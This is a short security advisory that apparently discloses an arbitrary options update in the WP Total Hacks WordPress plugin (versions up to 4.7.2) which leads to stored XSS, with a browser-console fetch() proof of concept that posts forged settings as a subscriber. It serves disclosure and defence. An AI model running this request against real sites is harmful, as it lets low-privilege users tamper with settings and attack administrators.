WP Total Hacks <= 4.7.2 - Subscriber+ Arbitrary Options Update to Stored XSS

The plugin does not prevent low privilege users from modifying the plugin’s settings. This could allow users such as subscribers to perform Stored Cross-Site Scripting attacks against other users, like administrators, due to the lack of sanitisation and escaping as well.

PoC

Run the below command in the developer console of the web browser while being on the blog as a subscriber user await fetch(“/wp-admin/”, { “credentials”: “include”, “body”: “wpbiz-nonce=aaa&tabid;=total-hacks-admin&wfb;_favicon=&wfb;_admin_favicon=&wfb;_apple_icon=&wfb;_remove_xmlrpc=&wfb;_hide_version=&wfb;_remove_more=&wfb;_remove_excerpt=&wfb;_disallow_pingback=&wfb;_google_analytics=wwwww&wfb;_google=ttttt&wfb;_bing=&wfb;_revision=&wfb;_selfping=&wfb;_pageexcerpt=&wfb;_createpagefordraft=&wfb;_custom_logo=&wfb;_admin_footer_text=&wfb;_login_logo=&wfb;_login_url=&wfb;_login_title=&wfb;_shortcode=&wfb;_oembed=&wfb;_webmaster=&wfb;_sendername=&wfb;_emailaddress=&wfb;_update_notification=&submit;=%C3%84nderungen+speichern”, “method”: “POST”, “mode”: “cors” });